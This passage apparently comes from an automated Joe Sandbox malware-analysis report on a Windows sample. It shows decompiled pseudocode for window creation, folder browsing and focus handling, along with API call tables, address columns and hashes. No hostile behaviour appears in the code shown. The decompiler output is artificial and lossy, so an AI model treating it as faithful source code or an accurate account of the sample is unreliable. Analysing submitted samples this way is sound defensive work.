                                                                                                                                                              						 *((short*)(_t182[1] + 0xa)) = 0xfa02;
                                                                                                                                                              						 *((char*)(_t182[1] + 6)) = 7;
                                                                                                                                                              						_t142 = CreateAcceleratorTableA(_t182[1], _t182[4]);
                                                                                                                                                              						_t182[5] = _t182[5] | 0xffffffff;
                                                                                                                                                              						_t182[2] = _t142;
                                                                                                                                                              						_t182[7] = 0;
                                                                                                                                                              						if(_v24 != 0) {
                                                                                                                                                              							_push( *_t182);
                                                                                                                                                              							L00407EE3();
                                                                                                                                                              						}
                                                                                                                                                              						_t143 = _a4;
                                                                                                                                                              						if(_t143 == _t182) {
                                                                                                                                                              							return _t143;
                                                                                                                                                              						} else {
                                                                                                                                                              							return  *_t182;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_a4 = _t182;
                                                                                                                                                              				if(_t182 != 0xffffffff) {
                                                                                                                                                              					goto L3;
                                                                                                                                                              				} else {
                                                                                                                                                              					_push(_t107);
                                                                                                                                                              					goto L4;
                                                                                                                                                              				}
                                                                                                                                                              			}

























                                                                                                                                                              0x00404b03
                                                                                                                                                              0x00404b12
                                                                                                                                                              0x00404b1f
                                                                                                                                                              0x00404b28
                                                                                                                                                              0x00404b2a
                                                                                                                                                              0x00404b37
                                                                                                                                                              0x00404b37
                                                                                                                                                              0x00404b3a
                                                                                                                                                              0x00404b46
                                                                                                                                                              0x00404b53
                                                                                                                                                              0x00404b55
                                                                                                                                                              0x00404b55
                                                                                                                                                              0x00404b63
                                                                                                                                                              0x00404b68
                                                                                                                                                              0x00404b6d
                                                                                                                                                              0x00404b70
                                                                                                                                                              0x00404b75
                                                                                                                                                              0x00404b78
                                                                                                                                                              0x00404b7d
                                                                                                                                                              0x00404b86
                                                                                                                                                              0x00404b90
                                                                                                                                                              0x00404b97
                                                                                                                                                              0x00404b9e
                                                                                                                                                              0x00404ba1
                                                                                                                                                              0x00404ba8
                                                                                                                                                              0x00404bae
                                                                                                                                                              0x00404bb4
                                                                                                                                                              0x00404bb6
                                                                                                                                                              0x00404bb6
                                                                                                                                                              0x00404bb9
                                                                                                                                                              0x00404bc2
                                                                                                                                                              0x00404bc4
                                                                                                                                                              0x00404bc4
                                                                                                                                                              0x00404bd0
                                                                                                                                                              0x00404bdd
                                                                                                                                                              0x00404bd2
                                                                                                                                                              0x00404bd2
                                                                                                                                                              0x00404bd8
                                                                                                                                                              0x00404bd8
                                                                                                                                                              0x00404be7
                                                                                                                                                              0x00404bed
                                                                                                                                                              0x00404bfb
                                                                                                                                                              0x00404bfe
                                                                                                                                                              0x00404c01
                                                                                                                                                              0x00404c0d
                                                                                                                                                              0x00404c10
                                                                                                                                                              0x00404c19
                                                                                                                                                              0x00404c23
                                                                                                                                                              0x00404c2d
                                                                                                                                                              0x00404c2f
                                                                                                                                                              0x00404c34
                                                                                                                                                              0x00404c34
                                                                                                                                                              0x00404c2d
                                                                                                                                                              0x00404c3a
                                                                                                                                                              0x00404c76
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404c78
                                                                                                                                                              0x00404c7d
                                                                                                                                                              0x00404c89
                                                                                                                                                              0x00404c8e
                                                                                                                                                              0x00404c9d
                                                                                                                                                              0x00404cad
                                                                                                                                                              0x00404cb0
                                                                                                                                                              0x00404cb5
                                                                                                                                                              0x00404cba
                                                                                                                                                              0x00404cbd
                                                                                                                                                              0x00404cbf
                                                                                                                                                              0x00404cbf
                                                                                                                                                              0x00404cc3
                                                                                                                                                              0x00404cc5
                                                                                                                                                              0x00404cc5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404cc3
                                                                                                                                                              0x00404c7f
                                                                                                                                                              0x00404c87
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404c3c
                                                                                                                                                              0x00404c3e
                                                                                                                                                              0x00404c47
                                                                                                                                                              0x00404c49
                                                                                                                                                              0x00404c49
                                                                                                                                                              0x00404c51
                                                                                                                                                              0x00404c56
                                                                                                                                                              0x00404c58
                                                                                                                                                              0x00404c61
                                                                                                                                                              0x00404c63
                                                                                                                                                              0x00404c63
                                                                                                                                                              0x00404c69
                                                                                                                                                              0x00404c6e
                                                                                                                                                              0x00404cc9
                                                                                                                                                              0x00404cd2
                                                                                                                                                              0x00404cef
                                                                                                                                                              0x00404cf9
                                                                                                                                                              0x00404cfb
                                                                                                                                                              0x00404dc9
                                                                                                                                                              0x00404dd8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404ddd
                                                                                                                                                              0x00404d0c
                                                                                                                                                              0x00404d15
                                                                                                                                                              0x00404d1d
                                                                                                                                                              0x00404d29
                                                                                                                                                              0x00404d2f
                                                                                                                                                              0x00404d2b
                                                                                                                                                              0x00404d2b
                                                                                                                                                              0x00404d2b
                                                                                                                                                              0x00404d1f
                                                                                                                                                              0x00404d1f
                                                                                                                                                              0x00404d1f
                                                                                                                                                              0x00404d33
                                                                                                                                                              0x00404d33
                                                                                                                                                              0x00404d41
                                                                                                                                                              0x00404d48
                                                                                                                                                              0x00404d4b
                                                                                                                                                              0x00404d58
                                                                                                                                                              0x00404d5e
                                                                                                                                                              0x00404d61
                                                                                                                                                              0x00404d6a
                                                                                                                                                              0x00404d73
                                                                                                                                                              0x00404d79
                                                                                                                                                              0x00404d82
                                                                                                                                                              0x00404d8b
                                                                                                                                                              0x00404d95
                                                                                                                                                              0x00404d9b
                                                                                                                                                              0x00404da2
                                                                                                                                                              0x00404da5
                                                                                                                                                              0x00404da8
                                                                                                                                                              0x00404daa
                                                                                                                                                              0x00404dac
                                                                                                                                                              0x00404dac
                                                                                                                                                              0x00404db1
                                                                                                                                                              0x00404db6
                                                                                                                                                              0x00404de3
                                                                                                                                                              0x00404db8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404db8
                                                                                                                                                              0x00404db6
                                                                                                                                                              0x00404c3a
                                                                                                                                                              0x00404b2f
                                                                                                                                                              0x00404b32
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404b34
                                                                                                                                                              0x00404b34
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404b34

                                                                                                                                                              APIs
                                                                                                                                                              • sprintf.MSVCRT ref: 00404B46
                                                                                                                                                              • memset.MSVCRT ref: 00404B63
                                                                                                                                                              • RegisterClassA.USER32(?), ref: 00404BA8
                                                                                                                                                              • AdjustWindowRect.USER32(?,00000010,00000000), ref: 00404C01
                                                                                                                                                              • GetSystemMetrics.USER32(00000000), ref: 00404C3E
                                                                                                                                                              • GetSystemMetrics.USER32(00000001), ref: 00404C58
                                                                                                                                                              • GetActiveWindow.USER32 ref: 00404C7F
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00404C8E
                                                                                                                                                              • CreateWindowExA.USER32(00000000,?,?,00000010,?,?,00000001,?,?,00000000,00000000), ref: 00404CEF
                                                                                                                                                              • SetPropA.USER32(00000000,PB_WindowID,00000100), ref: 00404D0C
                                                                                                                                                              • ShowWindow.USER32(00000000,00000001), ref: 00404D33
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,0000000C), ref: 00404D58
                                                                                                                                                              • CreateAcceleratorTableA.USER32(?,?), ref: 00404D95
                                                                                                                                                              • UnregisterClassA.USER32(?), ref: 00404DC9
                                                                                                                                                                • Part of subcall function 004066BB: memset.MSVCRT ref: 004066D8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$ClassCreateMetricsRectSystemmemset$AcceleratorActiveAdjustAllocateHeapPropRegisterShowTableUnregistersprintf
                                                                                                                                                              • String ID: PB_WindowID$WindowClass_%d
                                                                                                                                                              • API String ID: 1820370190-2937193648
                                                                                                                                                              • Opcode ID: 063ace8527f72d1ec566d245578ff32e7f27e017082b94de6c0a8473836dc150
                                                                                                                                                              • Instruction ID: 28adbf0df4d083847e84d8171d787dae0ee48a8b621b34b8ec1d13c8ba578f25
                                                                                                                                                              • Opcode Fuzzy Hash: 063ace8527f72d1ec566d245578ff32e7f27e017082b94de6c0a8473836dc150
                                                                                                                                                              • Instruction Fuzzy Hash: 3CA17AB190020ADFDB10CF69D989B9EBBF4FF44344F14862AF954A32A0D778D950CB99
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00404925(void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                              				char _v260;
                                                                                                                                                              				int* _t11;
                                                                                                                                                              				struct HWND__* _t12;
                                                                                                                                                              				struct HWND__* _t15;
                                                                                                                                                              				void* _t21;
                                                                                                                                                              				void* _t29;
                                                                                                                                                              				int* _t32;
                                                                                                                                                              				void* _t33;
                                                                                                                                                              
                                                                                                                                                              				_t29 = __edi;
                                                                                                                                                              				_t11 = E00406690( *0x40b42c, _a4);
                                                                                                                                                              				_t32 = _t11;
                                                                                                                                                              				if(_t32 != 0) {
                                                                                                                                                              					_t12 = GetWindow( *_t32, 4);
                                                                                                                                                              					if(_t12 != 0 && _t32[7] == 0) {
                                                                                                                                                              						SetActiveWindow(_t12);
                                                                                                                                                              					}
                                                                                                                                                              					_push(_t29);
                                                                                                                                                              					RemovePropA( *_t32, "PB_WindowID");
                                                                                                                                                              					if(RemovePropA( *_t32, "PB_DropAccept") != 0) {
                                                                                                                                                              						 *0x40a878( *_t32);
                                                                                                                                                              					}
                                                                                                                                                              					_t15 = _t32[7];
                                                                                                                                                              					if(_t15 == 0) {
                                                                                                                                                              						DestroyWindow( *_t32);
                                                                                                                                                              						sprintf( &_v260, "WindowClass_%d", _a4);
                                                                                                                                                              						UnregisterClassA( &_v260,  *0x40b0fc);
                                                                                                                                                              					} else {
                                                                                                                                                              						SendMessageA(_t15, 0x221,  *_t32, 0);
                                                                                                                                                              					}
                                                                                                                                                              					_t21 = _t32[1];
                                                                                                                                                              					if(_t21 != 0) {
                                                                                                                                                              						HeapFree( *0x40b0f8, 0, _t21);
                                                                                                                                                              						DestroyAcceleratorTable(_t32[2]);
                                                                                                                                                              					}
                                                                                                                                                              					_t33 = _t32[6];
                                                                                                                                                              					if(_t33 != 0) {
                                                                                                                                                              						DeleteObject(_t33);
                                                                                                                                                              					}
                                                                                                                                                              					return E004066BB( *0x40b42c, _a4);
                                                                                                                                                              				}
                                                                                                                                                              				return _t11;
                                                                                                                                                              			}











                                                                                                                                                              0x00404925
                                                                                                                                                              0x00404938
                                                                                                                                                              0x0040493d
                                                                                                                                                              0x00404941
                                                                                                                                                              0x0040494b
                                                                                                                                                              0x00404953
                                                                                                                                                              0x0040495c
                                                                                                                                                              0x0040495c
                                                                                                                                                              0x00404962
                                                                                                                                                              0x00404970
                                                                                                                                                              0x0040497e
                                                                                                                                                              0x00404982
                                                                                                                                                              0x00404982
                                                                                                                                                              0x00404988
                                                                                                                                                              0x0040498d
                                                                                                                                                              0x004049a3
                                                                                                                                                              0x004049b8
                                                                                                                                                              0x004049cd
                                                                                                                                                              0x0040498f
                                                                                                                                                              0x00404999
                                                                                                                                                              0x00404999
                                                                                                                                                              0x004049d3
                                                                                                                                                              0x004049d8
                                                                                                                                                              0x004049e3
                                                                                                                                                              0x004049ec
                                                                                                                                                              0x004049ec
                                                                                                                                                              0x004049f2
                                                                                                                                                              0x004049f7
                                                                                                                                                              0x004049fa
                                                                                                                                                              0x004049fa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404a09
                                                                                                                                                              0x00404a10

                                                                                                                                                              APIs
                                                                                                                                                              • GetWindow.USER32(00000000,00000004), ref: 0040494B
                                                                                                                                                              • SetActiveWindow.USER32(00000000), ref: 0040495C
                                                                                                                                                              • RemovePropA.USER32(00000000,PB_WindowID), ref: 00404970
                                                                                                                                                              • RemovePropA.USER32(00000000,PB_DropAccept), ref: 00404979
                                                                                                                                                              • RevokeDragDrop.OLE32(00000000), ref: 00404982
                                                                                                                                                              • SendMessageA.USER32(?,00000221,00000000,00000000), ref: 00404999
                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 004049A3
                                                                                                                                                              • sprintf.MSVCRT ref: 004049B8
                                                                                                                                                              • UnregisterClassA.USER32(?), ref: 004049CD
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 004049E3
                                                                                                                                                              • DestroyAcceleratorTable.USER32(?), ref: 004049EC
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004049FA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$DestroyPropRemove$AcceleratorActiveClassDeleteDragDropFreeHeapMessageObjectRevokeSendTableUnregistersprintf
                                                                                                                                                              • String ID: PB_DropAccept$PB_WindowID$WindowClass_%d
                                                                                                                                                              • API String ID: 3116416752-976223216
                                                                                                                                                              • Opcode ID: 884db38a7d1111d9f10292c509c9a9f5fdc1eb4f4251496c9c73458246e950c8
                                                                                                                                                              • Instruction ID: 76adc180981eb15cd37713a9aaa1cc34ae54204bacec3ed2c8797916cc70c0fb
                                                                                                                                                              • Opcode Fuzzy Hash: 884db38a7d1111d9f10292c509c9a9f5fdc1eb4f4251496c9c73458246e950c8
                                                                                                                                                              • Instruction Fuzzy Hash: CC214CB1500305EBDB216F71ED09F5B7BB9EB44740F148439FA41B21A0C736D8659B9D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                              			E004036F8(void* __ecx, void* __esi, intOrPtr _a4, _Unknown_base(*)()* _a8, intOrPtr _a12) {
                                                                                                                                                              				struct HINSTANCE__* _v8;
                                                                                                                                                              				char* _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				void _v40;
                                                                                                                                                              				int _v41;
                                                                                                                                                              				char _v300;
                                                                                                                                                              				struct HINSTANCE__* _t35;
                                                                                                                                                              				int _t41;
                                                                                                                                                              				_Unknown_base(*)()* _t51;
                                                                                                                                                              				char* _t56;
                                                                                                                                                              				int* _t57;
                                                                                                                                                              				int _t59;
                                                                                                                                                              				void* _t61;
                                                                                                                                                              				void* _t65;
                                                                                                                                                              				char* _t68;
                                                                                                                                                              				void* _t69;
                                                                                                                                                              				void* _t73;
                                                                                                                                                              
                                                                                                                                                              				_t65 = __esi;
                                                                                                                                                              				_t61 = __ecx;
                                                                                                                                                              				_t59 = 0;
                                                                                                                                                              				_t73 =  *0x40b1bc - _t59; // 0x0
                                                                                                                                                              				if(_t73 == 0) {
                                                                                                                                                              					 *0x40b1bc = 1;
                                                                                                                                                              					 *0x40a870(0);
                                                                                                                                                              				}
                                                                                                                                                              				memset( &_v40, _t59, 0x20);
                                                                                                                                                              				_t35 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                              				_v8 = _t35;
                                                                                                                                                              				if(_t35 == _t59) {
                                                                                                                                                              					L12:
                                                                                                                                                              					 *(E00407750(0x104, _a12)) = 0;
                                                                                                                                                              					L13:
                                                                                                                                                              					return E004077F0(0x104 - _t59);
                                                                                                                                                              				}
                                                                                                                                                              				if(_a8 == _t59) {
                                                                                                                                                              					_a8 = 0x409000;
                                                                                                                                                              				}
                                                                                                                                                              				strncpy( &_v300, _a8, 0x103);
                                                                                                                                                              				_v41 = _t59;
                                                                                                                                                              				_t41 = strlen( &_v300);
                                                                                                                                                              				if(_t41 > 3) {
                                                                                                                                                              					_t57 = _t69 + _t41 - 0x129;
                                                                                                                                                              					if( *_t57 == 0x5c) {
                                                                                                                                                              						 *_t57 = _t59;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_a8 = GetProcAddress(_v8, "SHBrowseForFolder");
                                                                                                                                                              				_v28 = _a4;
                                                                                                                                                              				_v40 = E0040390D(_t61);
                                                                                                                                                              				_v24 = 0x40;
                                                                                                                                                              				_v20 = E004036D1;
                                                                                                                                                              				_v16 =  &_v300;
                                                                                                                                                              				E004038B5(1);
                                                                                                                                                              				_a8 = _a8( &_v40, _t65);
                                                                                                                                                              				E004038B5(0);
                                                                                                                                                              				if(_a8 != _t59) {
                                                                                                                                                              					_t51 = GetProcAddress(_v8, "SHGetPathFromIDList");
                                                                                                                                                              					_t68 = E00407750(0x104, _a12);
                                                                                                                                                              					 *_t68 = 0;
                                                                                                                                                              					 *_t51(_a8, _t68);
                                                                                                                                                              					 *0x40a874(_a8);
                                                                                                                                                              					_t59 = strlen(_t68);
                                                                                                                                                              					_t56 =  &(_t68[_t59]);
                                                                                                                                                              					if( *((char*)(_t56 - 1)) != 0x5c) {
                                                                                                                                                              						 *_t56 = 0x5c;
                                                                                                                                                              						_t56[1] = 0;
                                                                                                                                                              						_t59 = _t59 + 1;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				FreeLibrary(_v8);
                                                                                                                                                              				if(_t59 != 0) {
                                                                                                                                                              					goto L13;
                                                                                                                                                              				} else {
                                                                                                                                                              					goto L12;
                                                                                                                                                              				}
                                                                                                                                                              			}






















                                                                                                                                                              0x004036f8
                                                                                                                                                              0x004036f8
                                                                                                                                                              0x00403702
                                                                                                                                                              0x00403704
                                                                                                                                                              0x0040370b
                                                                                                                                                              0x0040370e
                                                                                                                                                              0x00403718
                                                                                                                                                              0x00403718
                                                                                                                                                              0x00403725
                                                                                                                                                              0x00403732
                                                                                                                                                              0x0040373a
                                                                                                                                                              0x00403742
                                                                                                                                                              0x00403834
                                                                                                                                                              0x0040383d
                                                                                                                                                              0x00403840
                                                                                                                                                              0x0040384b
                                                                                                                                                              0x0040384b
                                                                                                                                                              0x0040374b
                                                                                                                                                              0x0040374d
                                                                                                                                                              0x0040374d
                                                                                                                                                              0x00403763
                                                                                                                                                              0x0040376f
                                                                                                                                                              0x00403772
                                                                                                                                                              0x0040377d
                                                                                                                                                              0x0040377f
                                                                                                                                                              0x00403789
                                                                                                                                                              0x0040378b
                                                                                                                                                              0x0040378b
                                                                                                                                                              0x00403789
                                                                                                                                                              0x0040379e
                                                                                                                                                              0x004037a4
                                                                                                                                                              0x004037ac
                                                                                                                                                              0x004037b7
                                                                                                                                                              0x004037be
                                                                                                                                                              0x004037c5
                                                                                                                                                              0x004037c8
                                                                                                                                                              0x004037d6
                                                                                                                                                              0x004037d9
                                                                                                                                                              0x004037e1
                                                                                                                                                              0x004037eb
                                                                                                                                                              0x004037f8
                                                                                                                                                              0x004037fe
                                                                                                                                                              0x00403801
                                                                                                                                                              0x00403806
                                                                                                                                                              0x00403812
                                                                                                                                                              0x00403814
                                                                                                                                                              0x0040381c
                                                                                                                                                              0x0040381e
                                                                                                                                                              0x00403821
                                                                                                                                                              0x00403825
                                                                                                                                                              0x00403825
                                                                                                                                                              0x0040381c
                                                                                                                                                              0x00403829
                                                                                                                                                              0x00403832
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00403718
                                                                                                                                                              • memset.MSVCRT ref: 00403725
                                                                                                                                                              • LoadLibraryA.KERNEL32(SHELL32.DLL), ref: 00403732
                                                                                                                                                              • strncpy.MSVCRT ref: 00403763
                                                                                                                                                              • strlen.MSVCRT ref: 00403772
                                                                                                                                                              • GetProcAddress.KERNEL32(?,SHBrowseForFolder), ref: 0040379C
                                                                                                                                                              • GetProcAddress.KERNEL32(?,SHGetPathFromIDList), ref: 004037EB
                                                                                                                                                              • strlen.MSVCRT ref: 0040380D
                                                                                                                                                              • FreeLibrary.KERNEL32(?,00000000), ref: 00403829
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressLibraryProcstrlen$FreeInitializeLoadmemsetstrncpy
                                                                                                                                                              • String ID: @$SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                              • API String ID: 4028521140-1801489780
                                                                                                                                                              • Opcode ID: d0772f556505189ebe70807fcab58d77b8969dd6fcc445947570fce6bb494dae
                                                                                                                                                              • Instruction ID: 3440e14c815a203a1a78cd3407a2a10063d2b49fea99d3606607f3928df854cf
                                                                                                                                                              • Opcode Fuzzy Hash: d0772f556505189ebe70807fcab58d77b8969dd6fcc445947570fce6bb494dae
                                                                                                                                                              • Instruction Fuzzy Hash: AF419171800208AFDB11EFA5CC45ADE7FB8AF05315F0080BAF554BA292D7B99E14CF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E00405C70(intOrPtr _a4) {
                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                              				struct HWND__* _v12;
                                                                                                                                                              				struct HWND__* _v16;
                                                                                                                                                              				struct HWND__* _v20;
                                                                                                                                                              				void* _v24;
                                                                                                                                                              				char _v76;
                                                                                                                                                              				int _t26;
                                                                                                                                                              				struct HWND__* _t38;
                                                                                                                                                              				struct HWND__* _t41;
                                                                                                                                                              
                                                                                                                                                              				_v8 = GetActiveWindow();
                                                                                                                                                              				_t38 = GetFocus();
                                                                                                                                                              				_v20 = 0;
                                                                                                                                                              				_v16 = 0;
                                                                                                                                                              				_v12 = 0;
                                                                                                                                                              				if(IsChild(_v8, _t38) == 0) {
                                                                                                                                                              					_v24 = 0;
                                                                                                                                                              					L8:
                                                                                                                                                              					_push( &_v24);
                                                                                                                                                              					if(_a4 == 0) {
                                                                                                                                                              						_t26 = EnumChildWindows(_v8, E00405BB5);
                                                                                                                                                              						if(_v16 == 0) {
                                                                                                                                                              							L14:
                                                                                                                                                              							return _t26;
                                                                                                                                                              						}
                                                                                                                                                              						return EnumChildWindows(_v8, E00405BB5,  &_v24);
                                                                                                                                                              					}
                                                                                                                                                              					_t26 = EnumChildWindows(_v8, E00405C1A);
                                                                                                                                                              					if(_v12 != 0 || _v20 == 0) {
                                                                                                                                                              						goto L14;
                                                                                                                                                              					} else {
                                                                                                                                                              						return SetFocus(_v20);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_v24 = _t38;
                                                                                                                                                              				_t41 = _t38;
                                                                                                                                                              				if(_t38 == 0) {
                                                                                                                                                              					goto L8;
                                                                                                                                                              				} else {
                                                                                                                                                              					goto L2;
                                                                                                                                                              				}
                                                                                                                                                              				do {
                                                                                                                                                              					L2:
                                                                                                                                                              					GetClassNameA(_t41,  &_v76, 0x32);
                                                                                                                                                              					if(strcmp( &_v76, "MDI_ChildClass") == 0) {
                                                                                                                                                              						_v8 = _t41;
                                                                                                                                                              						if(_t38 == _t41) {
                                                                                                                                                              							_v24 = 0;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_t41 = GetParent(_t41);
                                                                                                                                                              				} while (_t41 != 0);
                                                                                                                                                              				goto L8;
                                                                                                                                                              			}












                                                                                                                                                              0x00405c7f
                                                                                                                                                              0x00405c88
                                                                                                                                                              0x00405c90
                                                                                                                                                              0x00405c93
                                                                                                                                                              0x00405c96
                                                                                                                                                              0x00405ca1
                                                                                                                                                              0x00405ce6
                                                                                                                                                              0x00405ce9
                                                                                                                                                              0x00405cef
                                                                                                                                                              0x00405cf0
                                                                                                                                                              0x00405d24
                                                                                                                                                              0x00405d29
                                                                                                                                                              0x00405d39
                                                                                                                                                              0x00405d39
                                                                                                                                                              0x00405d39
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405d33
                                                                                                                                                              0x00405cfa
                                                                                                                                                              0x00405d03
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405d0a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405d0d
                                                                                                                                                              0x00405d03
                                                                                                                                                              0x00405ca5
                                                                                                                                                              0x00405ca8
                                                                                                                                                              0x00405caa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405cac
                                                                                                                                                              0x00405cac
                                                                                                                                                              0x00405cb3
                                                                                                                                                              0x00405ccb
                                                                                                                                                              0x00405ccf
                                                                                                                                                              0x00405cd2
                                                                                                                                                              0x00405cd4
                                                                                                                                                              0x00405cd4
                                                                                                                                                              0x00405cd2
                                                                                                                                                              0x00405cde
                                                                                                                                                              0x00405ce0
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetActiveWindow.USER32 ref: 00405C79
                                                                                                                                                              • GetFocus.USER32 ref: 00405C82
                                                                                                                                                              • IsChild.USER32 ref: 00405C99
                                                                                                                                                              • GetClassNameA.USER32(00000000,?,00000032), ref: 00405CB3
                                                                                                                                                              • strcmp.MSVCRT ref: 00405CC2
                                                                                                                                                              • GetParent.USER32(00000000), ref: 00405CD8
                                                                                                                                                              • EnumChildWindows.USER32(00000001,00405C1A,?), ref: 00405CFA
                                                                                                                                                              • SetFocus.USER32(?), ref: 00405D0D
                                                                                                                                                              • EnumChildWindows.USER32(00000001,00405BB5,?), ref: 00405D24
                                                                                                                                                              • EnumChildWindows.USER32(00000001,00405BB5,?), ref: 00405D33
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Child$EnumWindows$Focus$ActiveClassNameParentWindowstrcmp
                                                                                                                                                              • String ID: MDI_ChildClass
                                                                                                                                                              • API String ID: 1831758322-1946758919
                                                                                                                                                              • Opcode ID: c352efb6cce607ec546e30be8c2b5fe9326b74cc56803c011c7057062d4ff570
                                                                                                                                                              • Instruction ID: d253d9b16c365dcb60b46e847a60c04356fa5ff6473b175f6f9f07f47c3fcc33
                                                                                                                                                              • Opcode Fuzzy Hash: c352efb6cce607ec546e30be8c2b5fe9326b74cc56803c011c7057062d4ff570
                                                                                                                                                              • Instruction Fuzzy Hash: 1C210C72D04719EBDF11AFA59D488AFBBB8FE44301B20843BE501B2290D7384E51DF5A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E00404F24(long _a4) {
                                                                                                                                                              				struct tagMSG _v32;
                                                                                                                                                              				void* _t35;
                                                                                                                                                              				void* _t36;
                                                                                                                                                              				void* _t40;
                                                                                                                                                              				long _t45;
                                                                                                                                                              				void* _t57;
                                                                                                                                                              				struct HWND__* _t61;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              				void* _t69;
                                                                                                                                                              
                                                                                                                                                              				_t69 = E0040642D( *0x40b430);
